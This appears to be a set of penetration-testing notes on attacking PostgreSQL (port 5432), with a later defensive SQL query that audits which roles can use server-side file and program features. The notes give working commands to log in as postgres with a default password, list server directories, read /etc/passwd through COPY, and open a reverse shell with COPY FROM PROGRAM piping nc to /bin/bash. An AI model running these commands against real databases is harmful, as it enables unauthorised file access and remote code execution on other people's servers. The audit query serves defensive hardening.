Port 5432 - Postgres

psql -h $IP -p 5432 -U postgres -W postgres
\list, \c postgres, \d
select pg_ls_dir('/');

Read a file:

create table demo (t text); copy demo from '/etc/passwd'; select * from demo;

Shell:

  • Check Nibbles, splodge for RCE

  • Switch to db app:

\c app
drop table if exists cmd_exec;
create table cmd_exec(cmd_output text);

  • Set up nc listener

COPY cmd_exec FROM PROGRAM 'nc $IP $PORT -e /bin/bash';
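
To see which roles on a server are able to run the statements above, the audit query below is an added example, not part of the original notes. It assumes PostgreSQL 11 or later, where the predefined roles pg_read_server_files and pg_execute_server_program exist; the column aliases are illustrative names.

```sql
-- Added example: list roles that can use the server-side file and
-- program features shown in these notes. Assumes PostgreSQL 11+.
-- Superusers pass every check, so they always appear in the result.
SELECT r.rolname,
       r.rolsuper,
       r.rolcanlogin,
       -- pg_ls_dir() is superuser-only by default, but EXECUTE can be granted
       has_function_privilege(r.oid, 'pg_ls_dir(text)', 'EXECUTE')
           AS can_list_server_dirs,
       -- COPY ... FROM '/path' needs superuser or pg_read_server_files
       pg_has_role(r.oid, 'pg_read_server_files', 'MEMBER')
           AS can_copy_from_file,
       -- COPY ... FROM PROGRAM needs superuser or pg_execute_server_program
       pg_has_role(r.oid, 'pg_execute_server_program', 'MEMBER')
           AS can_copy_from_program
FROM pg_roles r
WHERE r.rolname !~ '^pg_'          -- skip the predefined roles themselves
  AND ( r.rolsuper
        OR has_function_privilege(r.oid, 'pg_ls_dir(text)', 'EXECUTE')
        OR pg_has_role(r.oid, 'pg_read_server_files', 'MEMBER')
        OR pg_has_role(r.oid, 'pg_execute_server_program', 'MEMBER') )
ORDER BY r.rolsuper DESC, r.rolcanlogin DESC, r.rolname;
```

Any login role listed here that an application uses for ordinary queries is a candidate for REVOKE of the predefined role (for example REVOKE pg_execute_server_program FROM some_role, where some_role is a placeholder) or for removal of SUPERUSER.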
